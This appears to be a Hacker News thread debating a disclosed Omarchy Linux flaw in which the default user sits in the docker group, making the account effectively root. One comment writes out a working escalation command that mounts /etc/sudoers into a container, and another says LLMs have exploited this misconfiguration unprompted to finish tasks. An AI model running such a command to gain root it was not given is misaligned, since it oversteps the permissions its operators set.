I don't find it to be too bloated, and the things I don't like I simply uninstall.
So far its the best Linux Desktop experience I've had, and I hardly have to configure anything out of the box, most of it just works.
moojacob 4 hours ago
That’s awesome! Everyone has different tastes. Personally I love GNOME because it’s extremely productive and works out of the box.
shdh 4 hours ago
cute_boi 5 hours ago
i don't understand why DHH is shipping so much bloat in omarchy. The better solution would be to ask if user wants to install bloatware during installation.
damanamathos 26 minutes ago
dhh understands what a good user experience is. Installing in a couple minutes and getting right into it is an amazing start compared to most operating systems that take ages to setup.
Plus, many pre-installs (like Zoom) are web-apps that take no space (30 lines of text) and are easy to remove if you don't want them in the menu.
alberth 5 hours ago
DHH created a distro for what he personally needs for work, and his company uses Zoom.
It's that simple.
NewJazz 4 hours ago
fwip 3 hours ago
Well, DHH is a moron. I don't know if he always was, but he clearly is now.
hashstring 5 hours ago
No one serious about security touches Omarchy.
Practically every distro suffers from critical LPEs, but at least there’s a bar.
Omarchy is a hot mess that exists for the same reason that matcha is in our coffeeshops and peptides are in our collective memory.
ryan_n 3 hours ago
Genuinely so confused about your last sentence, please explain…
JuniperMesos 4 hours ago
This is a weird metaphor - why do you think people buy matcha at coffeeshops or use peptides? Those two things don't have anything obvious to do with each other, let alone with Omarchy.
senectus1 3 hours ago
except that all three things are getting a lot of social media clout.
they just keep pumping out short form videos or yapping heads talking about how they use x to do y better than any of the old stuff...
I think this is the OP's point. they all exist because there is a lot of noise about them existing and being used.
pkulak 9 hours ago
Wow... this is really telling. This isn't some obscure whoopsie. The docker install page has a giant section explaining exactly this problem. Every Docker section on every distro wiki walks through this issue in detail. It 80% the reason Podman was created in the first place.
mentalgear 5 hours ago
Friends dont let friends use Omarchy or [claw] products.
antiloper 11 hours ago
Installing docker by default is completely insane. What are they doing? Rootless podman has been around for many years at this point.
lrvick 10 hours ago
Rootless docker is even an officially supported install method.
nilkn 4 hours ago
My most controversial opinion by far in tech circles is that I still just use a standard Windows gaming PC as my home desktop. My current machine I just bought pre-built from Microcenter, complete with a 5090 and everything.
I can fire up a Linux terminal with WezTerm and WSL2 at any point. It's customized and beautiful and totally fine. I have Codex running in one right now. I can listen to Dolby Atmos music through Apple Music or fire up a game with zero compatibility issues and full RTX support. It's just versatile like nothing else. I pair it with a gigantic 48" LG OLED TV as my monitor.
The only thing that might tempt me away from this is a fully loaded Mac Studio with 512GB of unified memory. That would be a real capability gap from my current machine. But I've contemplated wiping Windows and installing Omarchy, and I just can't figure out really what I'd gain, but what I'd lose is quite clear.
briHass 10 minutes ago
Windows has also come a long way from a terminal perspective. Sure, the UI is a bit of a mess, but Powershell can do anything in the UI from the command line, and agents are very capable with PoSH. If you really care about ricing the UI, there's hundreds of utility apps to do almost anything you want.
Agents are also able to tweak and debug Windows errors, since the registry, group policy, event log, and other Windows internals have been largely unchanged for 25+ years and are well documented. All have old command line tools or modern Powershell to manage.
asqueella 3 hours ago
Has it restarted losing your session to install an "Intel Corporation - Extension - 22.1120.5.12" yet?
teravor 5 hours ago
there is currently no linux distribution where it's safe to run an application as is. they tend to have access to /home which is game over.
some people who actually care about security will create bubblewrap/bwrap profiles for applications and then run those profiles. an application isolated in this way will have a limited view of the system much less the ability to modify it. it usually takes the form of a custom /home for every app.
this still leaves the kernel exposed for an application to poke at and maybe escape with a 0day. some people run a VMM to further isolate the application, these days you can passthrough Wayland. if the application isn't graphical you should probably use gVisor instead.
shdh 4 hours ago
Out of all the commentators here actually running Linux Desktop, I wonder how many have used Omarchy? To me its the best Linux desktop experience I've had without having to overly waste my time configuring things.
felixfurtak 7 hours ago
There are definitely a few security holes in Omarchy. I tried installing their win11 docker script and that just saves the username and password of the Windows VM as plain text in a config file.
I like playing around with Omarchy since there are a lot of interesting ideas put together in a semi cohesive 'OS', but would probably not use it for anything serious until it became a bit more mature.
dist-epoch 7 hours ago
you probably mean win11 vm script, that's not really a security hole, as the host running the vm you are basically root on windows anyway, unless you bothered to encrypt the drive inside the windows vm
tasuki 9 hours ago
Yes ok, but the moment you gain user access to my machine, I've already lost. The amount of damage you can do as root is about the same you can do as me.
comandillos 10 hours ago
The docker escalation 'trick' is even a meme at this point
ruby_curmudgeon 11 hours ago
Somebody should do an audit of Omarchy Plugins: https://plugins.omarchy.org/
They run completely unsandboxed and are unvetted.
pibaker 11 hours ago
I was expecting a more sophisticated attack and then I scrolled down…
> Omarchy configured its default user as a member of the Linux docker group.
What the fuck? Docker makes it VERY, VERY clear this is unsafe. Feel free to verify the documentation.
https://docs.docker.com/engine/install/linux-postinstall/
Why would you want to make this the default for your users, without even telling them? Did someone configured his own system to work this way and decided it is a good idea to ship it as a part of an "opinionated" distro??? Makes you wonder how much other crap is there.
dragonwriter 10 hours ago
> Did someone configured his own system to work this way and decided it is a good idea to ship it as a part of an "opinionated" distro???
Isn't that the entire selling point of Omarchy?
SahAssar 5 hours ago
There is a major difference between uploading your dotfiles to github and shipping it as a mass-marketed distro.
At the very least they could have documented this sort of security trade-off if it actually is an intentional choice.
inigyou 9 hours ago
I didn't know that was unsafe.
Well, it's not unsafe because anyone who can exploit it has already fully compromised my PC. It rather involved being on the other side of this airtight hatchway. But I didn't know that putting an actually locked down account in the docker group was unsafe.
AndroidKitKat 3 hours ago
I don't use Omarchy, nor would I, but I think that "VERY, VERY" is a little hyperbolic, no? It's a simple `admonish-yellow` warning box that says something vague about root-level privileges and wants me to read more about what this actually means. I would wager that a large amount of people scroll past that with no second thought because it really doesn't come off as that bad. I know I configure most, if not all, of my systems this way. Many people probably don't actually understand the implications of what they are doing, and perhaps the Docker team should actually put a little bit more effort into scaring users off.
Perhaps Omarchy shouldn't have shipped this by default, but the whole point of the system is to be DHH's personal computer just the way he likes it (to include not 1, but 2 shortcuts to Twitter!) - all his products are that way and largely the reason why I don't ever think I could use one long term.
k_roy 11 hours ago
Default configuration or not, I also imagine the first thing people using docker do is to add themselves to the docker group via sudo.
If you are security-conscious, you shouldn’t be using docker anyway.
pibaker 11 hours ago
If you are adding yourself to the docker group, you have presumably read the documentation and its warnings. Does an Omarchy user know the distro has made the decision on their behave?
TFA spells out why this is wrong better than I could.
> There is another important aspect of this configuration. It was opt-out, not opt-in. A user did not have to actually use Docker. The security tradeoff was made for them, applied to the default account, and the tradeoff was not explained to the user.
> Security-sensitive defaults matter precisely because many users reasonably assume that the operating system defaults to secure and will inform or prompt them to opt-in to less secure settings.
k_roy 11 hours ago
inigyou 11 hours ago
I have passwordless sudo anyway. XKCD knows why the password is pointless.
esskay 11 hours ago
> Why would you want to make this the default for your users
Because DHH doesn't have a clue what he's doing and is farming his brain out to Claude. Again.
qweqwe14 11 hours ago
Because it's convenient, and the security of this doesn't matter for desktop usage.
iririririr 11 hours ago
lol. people will vote you and not realize the irony.
just look at all the comments "this is a fair and common mistake" that are not being ironic.
dalmo3 10 hours ago
I had no idea what Omarchy was, so I looked it up: https://omarchy.org/
Is there a name for a phobia of yt thumbnails?
jaccola 10 hours ago
Yes.. taste
kodoman 7 hours ago
Not an Omarchy user and use podman rather then docker. But is this not a docker issue rather then a Omarchy issue, docker should verify user permissions through the socket, it's quite bad that it does not no?
SahAssar 5 hours ago
Sorta, but there is a reason that no other distro does this by default and that docker itself warns that doing this is effectively giving the user password-less sudo.
So this is a problem in Omarchy specifically since it does the dangerous thing silently and by default while everyone else tries to inform the user of the consequences.
WhyNotHugo 6 hours ago
I can't fathom why it's so common to run docker as root instead of as an unprivileged user.
Docker has supported running rootless mode for years. I packaged the docker-rootless into Arch/AUR over 4 years ago, so it's been around and stable that long.
Sure, on a server dedicated to running docker containers, maybe it makes sense for the marginal improvements to network latency. But otherwise, rootless should always be the default.
NewJazz 4 hours ago
Inertia. All the guides tell you to set it up the "easy" way.
SamInTheShell 3 hours ago
Poor software choice for usecase. `sudo pacman -S podman` didn't come with these problems out of the box and assumed rootless by default.
andrewvc 6 hours ago
Once you have a box vibe coding has happened on I wouldn’t trust anything on it. Thats why I vibe code on a fully separate machine.
Im not an Omarchy user but we now live in a world where most of the actions (including ones the llm asks users to run as root) originate from somewhere other than the users brain.
There will be a reckoning in terms of how we think about trust and auth in coming years. It’s just a matter of increasing severity of incidents .
archole 11 hours ago
As expected from a vibecoded "distro"
wildster 11 hours ago
Debian 13 is good.
addajones 10 hours ago
There were many amazing distros before Omarchy and there will be many after. Use whatever you want, vibecoded or not. Don't tell people what to do. Make your own decisions.
yoyohello13 8 hours ago
And the cycle continues. It’s funny seeing Omarchy (DHH) becoming popular when we had LARBS (Luke Smith) 8-10 years ago.
Something about a controversial personality pushing a window manager install script is really appealing to people I guess. At least it brings awareness that other desktop paradigms exist. Although after years of ‘optimizing’ my tiling window manager I just ended up back on KDE.
tripleee 8 hours ago
Debian + KDE is the most effortless setup I've ever used. I also spent years using tiling window managers and I don't see the value
rglover 4 hours ago
"That Luke Smith?" Yep.
PaulHoule 11 hours ago
I hate to be defending Omarchy but I think for the modern desktop OS like Linux or Windows or Mac OS, "root" is not what it used to be.
Like if I have something on my dev machines which is important from an enterprise perspective it is the credentials that I use to check things into the git repository or log into the postgresql database that are in some file or keyring or the credentials I used to log into some corporate IT system with my web browser. Or the Microsoft Word document with confidential plans, or the spreadsheet with personal data on 30,000 people that I don't really need to have, etc.
The "root" barrier is of limited effectiveness against those sort of attacks but the barrier between users is less important on a personal computer as opposed to the "minicomputer" world that gave birth to Unix.
In 1989 my school had a cluster of Sun Workstations running Unix for which student, faculty, and staff had accounts and it was a real threat model that you might steal the homework assignment of another student or you might take screenshots of the screen of the computer center's director that would let you watch him reading his email his email and such.
I more concerned that Apache is running under a "httpd" account or IIS is running under its own account so that I do have controls on what can be exfiltrated by that route but...
The modern developer is likely booting up a sinatra or JAXB or a httpx server on some high numbered port running as their own user so if they're going to get hit with data exfiltration or remote execution against a dev server the scope is most user files.
JuniperMesos 4 hours ago
I would say that the traditional notion of Unix root and normal user accounts is outdated, no longer useful for how people use computers today. On my personal laptop, malicious code having access to my user files is as bad as having root access - I'm the only user of my machine - and I don't have any convenient way to create more granular security zones among software running as my own Unix user.
kodoman 7 hours ago
The scenario of running any agent on the host raw seems far fetched for most users. I think everyone is running these things in at least a container, I know I never trusted running claude code or any agent for that matter, but I might be a little paranoid on that front.
qweqwe14 11 hours ago
OK... and? This doesn't matter for a desktop, because:
1. Having access to the user's home directory is way more serious than being able to install drivers or whatever
2. There are a million other ways to escalate to root by obtaining the user's password
I also don't understand the point of these distros, just install Arch with KDE via archinstall, it literally takes 15 minutes. Why is it that people feel the need to use someone's Arch setup?
KetoManx64 10 hours ago
The point is that there are millions of people out there that are curious about Linux but are put off by anything command line. Distro like this, especially Quatro which has a big focus on agents, makes it more inviting and gives people an instant path to get help/have their problems solved without them having to search archaic error messages
shdh 4 hours ago
Because it works out of the box unlike a lot of other distros
jp_sc 11 hours ago
Because they like their Arch setup? Because installing Omarchy is three to five minutes at most so three to five times faster? XD
gruez 11 hours ago
lobofta 11 hours ago
Because it looks cool and DHH makes a lot noises that sounds like you should listen to him.
mandeepj 2 hours ago
Lol! He's gordon ramsay of tech, who's frequently contradictory himself. On Round 2 with lex, he said something like no one lost recently due to using digital Maps. Well, check this one - https://youtu.be/z5ElIor-oXk?si=XfcS1UtC2OWReVXr
He's bashing and insulting all engineers and then asking for their contributions and complaining that not many people are committing code in open source repos.
inigyou 11 hours ago
And he politically aligns with a lot of people.
jksmith 9 hours ago
Barely related, I decided to move on. Linux has been weaponized for self-promotion. So I'm happy just working with Beastie these days.
vinniepukh 9 hours ago
anecdotal and fwiw, Omarchy is the first distro that "stuck". I've been using it on my desktop for a year now. I use it for personal projects and light gaming via Steam. Personal MacBook is only used when I want to compute on the couch. Work computer is also a MacBook. But everything else, Omarchy desktop.
Previous attempts with Ubuntu and PopOS! never stuck.
dmix 5 hours ago
Docker should never be used as a sandbox for anything.
ahmetozer 6 hours ago
Couple of months after this discovery, Internet explorer 11 will be released (October 17, 2013)
isatty 11 hours ago
What on earth is an Omarchy
12985-1286 11 hours ago
Officially omakase (clueless chef decides your menu with security issues) and arch linux.
The fact that it is almost an anagram of monarchy is probably a plus for DHH.
preommr 9 hours ago
> The fact that it is almost an anagram of monarchy is probably a plus for DHH.
I spend way too much time online; but it's good to know I am not this terminally online.
isatty 8 hours ago
Thank you! Sounds horrible.
I don’t know what a DHH is though, probably not important.
jm4 6 hours ago
enbugger 11 hours ago
You realize you are exemplary hater when you feel an urge to post comments like this
khash12 10 hours ago
delduca 11 hours ago
Is it not better to run a VM just for Docker, like we have to do on macOS?
gruez 11 hours ago
That has all sorts of issues like eating disk space and RAM, because neither can't be released to the host once allocated, but then become unused.
delduca 11 hours ago
At least is secure(tm)
K0IN 11 hours ago
I just want to put this out there, smolmachines is a wonderful program to solve this, I use this mostly for stuff needing docker socket / docker in docker (example strix and agents). (I'm using podman on my host)
Anonyneko 11 hours ago
At that point why not just simplify things and go back to Vagrant...?
dimitarbogdanov 11 hours ago
Damn, I did not know you need a VM for Docker on macOS. That's kind of ironic, isn't it XD
Every day I wake up and thank the universe for MS making WSL2
maleldil 11 hours ago
WSL2 is also a virtual machine.
anglesideangle 11 hours ago
WSL2 is also a VM. docker relies on the linux kernel apis, so it must be ran inside a linux VM on macos or windows
isityettime 11 hours ago
WD-42 11 hours ago
I’d rather run real Linux in a VM than a buggy appropriation of it in WSL
skydhash 11 hours ago
Isn’t WSL2 vm based?
arjie 11 hours ago
Surprised by this. I only ever use podman (which by default, runs rootless) these days and haven’t felt the need for docker. Feels like reading about a CVE in Compiz.
techscruggs 11 hours ago
This is the type of security and vulnerability testing that actually matters. In a sea of security researcher noise, thank you for contributing in a meaningful way.
plqbfbv 5 hours ago
docker access == root, as long as you can use volume mounts to arbitrarily mount anything else on the machine to a container. If the user is in the `docker` group, he's effectively root because he can patch around system files.
I once used this to recover lost sudoer access to a machine (have tested this now by editing my sudoer file with a comment):
~ docker run -it --rm -v /etc/sudoers:/etc/sudoers ubuntu bash
# apt update && apt install -y vim
# -- edit /etc/sudoers
# wq!
~ exit
~ sudo cat /etc/sudoers - works, comment is present
numpad0 9 hours ago
ot fyi: "omarchy" is fine as a creative spelling for omachi, but "omacon" / "omacom" has extremely low Levenshtein distance with the honorific form of the word for human female reproductive component in japanese
JuniperMesos 4 hours ago
And the word "pine" is kinda close to "penis", what of it? Words in languages sometimes sound kinda like rude or sexual vocabulary, especially in a language like Japanese with a relatively small phoneme inventory.
numpad0 4 hours ago
Those two aren't as close
SwellJoe 10 hours ago
"Opinionated" software sounds great until you find out the author has the stupidest opinions you've ever heard in your life.
argsnd 10 hours ago
and in this case that's even before you get to the software opinions
inigyou 9 hours ago
Why is it always the people with the worst opinions who make the most stuff though? Why aren't the rest of us making popular stuff?
al_borland 7 hours ago
SwellJoe 6 hours ago
eahm 7 hours ago
And here it begins…
Been using Linux on and off for 30+ years and I’ve always always had second thoughts about using anything outside the main 3-4 distros, and I mean forks, blends etc. let alone vibe coded distros, even *buntu feels like a stretch.
I really like DHH’s enthusiasm and what he’s trying to do but I will never touch that “distro”.
Debian/Devuan, Fedora/RHEL/Alma/Rocky, Arch/Artix, FreeBSD/OpenBS/NetBSD are all anyone will ever need.
You feel more adventurous? NixOS, Gentoo, Slackware, Void.
That’s it. No forks, no blends.
I keep Xebian and LMDE ISOs in my flash drive to show people but I don’t personally use even those.
People jumping all around these new distros that only seem to change a wallpaper without knowing the basics is a bad choice, like the first comment says, isn’t this the reason you wanted to move away from Windows in the first place?
Just take your time and enjoy learning, they are all so simple today compared to decades ago it’s crazy.
Thank you for listening to my TED talk.
tescreal 4 hours ago
It's disappointing to see the way the developers are pushing this pre-alpha quality work. I don't know (nor care) about the personalities attached, but the pitch is neat. The way it is being handled with almost daily reports of RCE/Escalation is jaw dropping though. They need to spend some of those bux on auditing and less on whatever vibe-based engineering they're doing.
For haters: ignore them and recommend your favourite. For lovers: lobby the developers to raise their standards.
ghthor 4 hours ago
If you editing your system config with an LLM and tool calls, why wouldn’t you just use NixOS. At least if the agent broke your system, you can basically recreate it from scratch in under 30mins (some things still might be outside the system/home-manager config). But yeah, then you get diffs of what the agent changed in a nixos/home-manager change.
I see almost zero reason for anyone to use anything else for they’re base system at this point.
Retr0id 11 hours ago
Lol. This misconfiguration is so common and so trivial that LLMs have been known to exploit it unprompted, to complete their task.
bakugo 9 hours ago
Ubuntu has the exact same vulnerability, except with lxd instead of docker, but for some reason, it's considered working as intended.
On a fresh install of Ubuntu Server, the first user created is part of the lxd group, can install lxd without root thanks to snap, and can immediately create a privileged container with the host's root filesystem mounted inside.
trentor 10 hours ago
I genuinely put companies that invested in this on my blacklist. I don't care about the politics behind it. His whole persona is and was to be edgy and cruel so nothing will change here. But there are probably millions of oss projects that deserve the funding more.
Mon0t0n 6 hours ago
why would anyone use this distro when there are so many options? genuine question.
slig 5 hours ago
DHH is an influencer and people like to follow them. I know I did 20 years ago when his videos influenced me into saving for a MacBook. He basically meme'd web dev with rails on TextMate.
Cameri 4 hours ago
Was this vulnerability disclosed responsibly by the author?
shevy-java 5 hours ago
That's some fame now.
porridgeraisin 11 hours ago
I mean, I saw this on twitter, and thought ok maybe its a nice exploit. But really? its the usual docker root thing?
I wouldn't even consider that a vulnerability tbh, every personal laptop I had I add myself to docker group. Yes, you can not namespace pids, filesystem, etc, and get root, but it's never mattered.
If someone can run that docker command, they can already read your whole homedir, edit bashrc, etc etc,. and sudo is useless anyways.
Only on a system where you are a user without sudo access, does it even begin to make sense. And if you go to the trouble of intentionally setting up a user without sudo access, you wouldn't be adding that user to the docker group either. In the default install, I assume omarchy adds you to the sudoers as well, making this a perfectly ok thing to do
Even if you participate in the esteemed Red Hat Security Theater and use wayland, flatpaks, etc, most flatpaks can write anywhere in your home dir, so they can do this too.
On standard linux desktop, sudo is not really security, but it is a UX improvement as it adds friction to accidentally doing things to the "system".
[I don't use omarchy]
ThePowerOfFuet 6 hours ago
>the most important takeaway is simple: update to 4.0.1.
I gotta say, that is not the most important takeaway for me; rather, "don't walk, run".
randerson 7 hours ago
The likelihood of Omarchy being hacked is no doubt compounded by the number of enemies DHH has created who would love to see him fail.
zsoltkacsandi 9 hours ago
That is what happens when someone without a clue what is he (khm, DHH) doing vibe codes a distro.
lelota 10 hours ago
Other day i was hearing DHH talk on Lex's podcast on Omarchy and how he does not look at the code anymore. The guy built solid reputation with his prev contributions but now falling to AI slop.
ok123456 10 hours ago
He must really be all in on AI to be interviewed by one.
shdh 4 hours ago
He said he still reviews code, just for some tools he's vibe coding for himself he didn't look at the source.
hollow-moe 11 hours ago
10M for a some shell scripts what a steal lmao
mistercheph 9 hours ago
No way, the vibecoded distro has security problems!?!?! WTF, didn't DHH ask claude to check for security issues?
addajones 10 hours ago
Sad that people just complain about what DHH is doing and how he doesn't know anything. Nobody is forcing anybody to use Omarchy at all. Also $10 million was raised by him for it, did anybody else here raise that for a distro? I'm tired of the constant complaining and criticizing. Nobody said you have to use it.
obelos 5 hours ago
The funding for this is to pay for a culture war, not a distro.
eviks 10 hours ago
Nobody said you can't complaint about things unless you're forced to use them!
addajones 9 hours ago
Well thats what I've noticed lately here on HN, complaining is #1, everything else follows. lol.
Arrowmaster 9 hours ago
I don't care what he's doing, I care about what he is.
addajones 9 hours ago
He's a person, just like you are. Let him know then, he has an email and you can message him publicly on X.
newspaper1 9 hours ago
jarek-foksa 9 hours ago
TiredOfLife 9 hours ago
What he is or what random blog posts present him as?
Arrowmaster 9 hours ago
jtari3333 2 hours ago
LightBug1 7 hours ago
Interesting point. I'll summarise my counter response as: fuck DHH. Guy can shove an omarchy up his jacksy.
rfgplk 10 hours ago
I've already stated this on the last Omarchy thread, the way DHH is implementing it is highly irresponsible and insecure. Half of his "distro" are essentially shell scripts where it's extremely easy to create accidental security holes. Considering that probably half of his code would need something like setuid/execute bits set in order to avoid configuration spaghetti, I'd imagine that there are _hundreds_ of vulnerabilities in there. If you think about it logically, just the desktop environment (note that I have no idea if he coded his own or is using an existing one) needs access to input the graphics driver the netstack all of which require priviledges of some kind.
arandomhuman 10 hours ago
He did not code his own desktop environment, it’s just hyprland.